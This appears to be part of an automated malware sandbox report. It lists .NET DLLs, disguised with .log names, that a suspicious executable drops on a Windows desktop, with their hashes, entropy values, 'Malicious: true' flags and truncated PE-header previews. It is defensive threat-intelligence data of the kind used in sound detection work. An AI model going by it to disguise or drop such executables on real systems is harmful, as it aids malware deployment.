SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lhRaqYLf.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mRjyKgxZ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mjqRZCrc.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\mwiZumHK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\mxRxOeus.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nMwoFxOX.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nXdxeIZI.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\njEJMHQa.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\npkPtdTK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nvPhTzIk.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oMSZXQhy.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oPLHggMU.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oSxqxmWY.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\oVcWqdBJ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ohOpBzSD.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qSDeLdQE.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qUjZTVbT.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qVSxnNNB.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qaPgAreD.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rLgPOzBo.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rNlQSMnT.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rpuWqKyh.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sYivqdzV.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
